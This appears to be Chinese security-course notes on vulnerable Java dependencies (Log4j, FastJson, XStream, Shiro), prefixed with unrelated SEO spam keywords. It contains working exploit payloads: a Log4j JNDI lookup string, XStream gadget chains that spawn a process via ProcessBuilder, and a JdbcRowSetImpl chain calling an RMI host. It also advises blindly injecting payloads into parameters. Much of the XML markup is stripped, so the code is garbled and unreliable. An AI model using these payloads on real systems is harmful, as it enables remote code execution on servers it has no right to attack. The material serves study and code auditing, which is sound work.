南通网站关键词优化,wordpress蜜蜂采集,官方网站旗舰店,忘记了wordpress登录密码怎么办#知识点 1、安全开发-JavaEE-第三方依赖开发安全 2、安全开发-JavaEE-数据转换FastJsonXStream 3、安全开发-JavaEE-Shiro身份验证Log4j日志处理 一、Log4j 一个基于Java的日志记录工具#xff0c;当前被广泛应用于业务系统开发#xff0c;开发者可以利用该工… #知识点 1、安全开发-JavaEE-第三方依赖开发安全 2、安全开发-JavaEE-数据转换FastJsonXStream 3、安全开发-JavaEE-Shiro身份验证Log4j日志处理 一、Log4j 一个基于Java的日志记录工具当前被广泛应用于业务系统开发开发者可以利用该工具将程序的输入输出信息进行日志记录。 1、Maven引用 dependency groupIdorg.apache.logging.log4j/groupId artifactIdlog4j-core/artifactId version2.14.1/version /dependency 2、接受输入值 3、Log4j错误处理 String code${java:os}; log.error({},code); 4、Jndi注入RCE执行 String exp${jndi:ldap://xx.xx.xx.xx:xx/xxx}; logger.error({},exp); 演示2.14.1版本 结论尝试输出日志时可利用JNDI注入触发RCE 利用黑盒在各种地方插入 白盒看哪里有调用见图 黑盒:打开一个网页看到有上传参数的点无脑上传log4j的payload因为不知道代码也不知道是哪里接受恶意参数只能无脑上传来测试 白盒做代码审计看哪里调用了会引发log4j漏洞的地方 参考https://mp.weixin.qq.com/s/95Jxj3R9q95CFhCn86IiYA 二、FastJson不同版本漏洞不一样 一个阿里巴巴开发的Java库提供了Java对象与JSON相互转换。 1、fastjson1.2.24的漏洞 dependency groupIdcom.alibaba/groupId artifactIdfastjson/artifactId version1.2.24/version /dependency 2、fastjson1.2.25的漏洞 dependency groupIdcom.alibaba/groupId artifactIdfastjson/artifactId version1.2.25/version /dependency 3、序列化方法 JSON.toJSONString()返回字符串 JSON.toJSONBytes()返回byte数组 4、反序列化方法 JSON.parseObject()返回JsonObject JSON.parse()返回Object JSON.parseArray(), 返回JSONArray 将JSON对象转换为java对象JSON.toJavaObject() 将JSON对象写入write流JSON.writeJSONString() 6、常用 JSON.toJSONString(),JSON.parse(),JSON.parseObject() 7、演示1.2.24及1.2.25版本 结论反序列化时会调用类里的get及set方法 利用已知类的调用方法 自带类的调用链固定版本的CVE见图 黑盒 ①看抓包报错url访问报错工具扫描等能不能暴露astjson及其版本 ②前提是Java写的应用看burpsuite数据包传递JSON数据,尝试用payload替换json数据无脑payload 白盒:java调用fastjson库并知道版本代码审计看调用方法如parse(),parseObject()和可控变量 参考https://mp.weixin.qq.com/s/EPdNElXPcZd5wEmQqAhFiQ 三、XStream 一个简单的基于Java库Java对象序列化到XML反之亦然(即可以轻易的将Java对象和XML文档相互转换)。 1、Xstream1.4.5 dependency groupIdcom.thoughtworks.xstream/groupId artifactIdxstream/artifactId version1.4.5/version /dependency 2、Xstream1.4.15 dependency groupIdcom.thoughtworks.xstream/groupId artifactIdxstream/artifactId version1.4.15/version /dependency 3、序列化Car类 Car car new Car(Ferrari, 4000000); XStream xStream new XStream(); String xml xStream.toXML(car); System.out.print(xml); 4、反序列化Car类 String xml 上述序列化类的数据; XStream xStream new XStream(); xStream.fromXML(xml); 结论反序列化时会调用类里的readObject方法(类需继承接口) 参考https://mp.weixin.qq.com/s/M_oQyZYQEFu0nbG-IpJt_A 5、已知类的调用方法也就是上面的Car类被序列化反序列化且继承了serializable,类中有readObject方法-:下面的payload才生效条件比较苛刻 String xml com.example.xstreamdemo.Car serialization\custom\\n com.example.xstreamdemo.Car\n //Car类继承了serializable,类中有readObject方法 default\n price4000000/price\n nameFerrari/name\n /default\n /com.example.xstreamdemo.Car\n /com.example.xstreamdemo.Car; 6、自带类的调用链固定版本的CVE ①适用xstream1.4.5版本不适用xstream1.4.15版本 String payload sorted-set\n dynamic-proxy\n interfacejava.lang.Comparable/interface\n handler class\java.beans.EventHandler\\n target class\java.lang.ProcessBuilder\\n command\n stringcalc.exe/string\n /command\n /target\n actionstart/action\n /handler\n /dynamic-proxy\n /sorted-set; ②适用xstream1.4.15版本 String pocjava.util.PriorityQueue serializationcustom\n unserializable-parents/\n java.util.PriorityQueue\n default\n size2/size\n comparator classsun.awt.datatransfer.DataTransferer$IndexOrderComparator\n indexMap classcom.sun.xml.internal.ws.client.ResponseContext\n packet\n message classcom.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart\n dataSource classcom.sun.xml.internal.ws.message.JAXBAttachment\n bridge classcom.sun.xml.internal.ws.db.glassfish.BridgeWrapper\n bridge classcom.sun.xml.internal.bind.v2.runtime.BridgeImpl\n bi classcom.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl\n jaxbTypecom.sun.rowset.JdbcRowSetImpl/jaxbType\n uriProperties/\n attributeProperties/\n inheritedAttWildcard classcom.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection\n getter\n classcom.sun.rowset.JdbcRowSetImpl/class\n namegetDatabaseMetaData/name\n parameter-types/\n /getter\n /inheritedAttWildcard\n /bi\n tagName/\n context\n marshallerPool classcom.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1\n outer-class reference../../\n /marshallerPool\n nameList\n nsUriCannotBeDefaulted\n booleantrue/boolean\n /nsUriCannotBeDefaulted\n namespaceURIs\n string1/string\n /namespaceURIs\n localNames\n stringUTF-8/string\n /localNames\n /nameList\n /context\n /bridge\n /bridge\n jaxbObject classcom.sun.rowset.JdbcRowSetImpl serializationcustom\n javax.sql.rowset.BaseRowSet\n default\n concurrency1008/concurrency\n escapeProcessingtrue/escapeProcessing\n fetchDir1000/fetchDir\n fetchSize0/fetchSize\n isolation2/isolation\n maxFieldSize0/maxFieldSize\n maxRows0/maxRows\n queryTimeout0/queryTimeout\n readOnlytrue/readOnly\n rowSetType1004/rowSetType\n showDeletedfalse/showDeleted\n dataSourcermi://192.168.1.4:1099/rj6obg/dataSource\n //该payload需在此处生成JNDI的注入语句 params/\n /default\n /javax.sql.rowset.BaseRowSet\n com.sun.rowset.JdbcRowSetImpl\n default\n iMatchColumns\n int-1/int\n int-1/int\n int-1/int\n int-1/int\n int-1/int\n int-1/int\n int-1/int\n int-1/int\n int-1/int\n int-1/int\n /iMatchColumns\n strMatchColumns\n stringfoo/string\n null/\n null/\n null/\n null/\n null/\n null/\n null/\n null/\n null/\n /strMatchColumns\n /default\n /com.sun.rowset.JdbcRowSetImpl\n /jaxbObject\n /dataSource\n /message\n satellites/\n invocationProperties/\n /packet\n /indexMap\n /comparator\n /default\n int3/int\n stringjavax.xml.ws.binding.attachments.inbound/string\n stringjavax.xml.ws.binding.attachments.inbound/string\n /java.util.PriorityQueue\n /java.util.PriorityQueue; 特别注意 以上payload用到了JNDI注入该注入也有版本限制这个版本限制指的是java运行程序使用的jdk版本限制-造成我们白盒/黑盒发现了该Java代码使用xstream组件也知道该组件的版本并从网上找到了该版本xstream的payload-但是payloa执行不成功-分析很有可能是jkd版本不对该paoload里面有JNDI注入该注入受jdk版本限制 黑盒 ①看抓包报错url访问报错工具扫描等能不能暴露Xstream及其版本 ②前提是Java写的应用看burpsuite数据包传递XML数据,尝试用payload替换jxml数据无脑payload 白盒:看调用方法和可控变量 四、Shiro 一个强大且易用的安全框架可用于身份验证、授权、加密和会话管理等。 开发技术利用AI提示写一个 结论配置不当或版本安全漏洞 利用固定版本的CVE利用见图 shiro工具利用 黑盒:看身份验证数据包-是否有关键字Rememberme-判定网站使用了shiro 白盒:看版本及安全问题 参考https://mp.weixin.qq.com/s/kmGcrVmaLi0Db_jwKKNXag
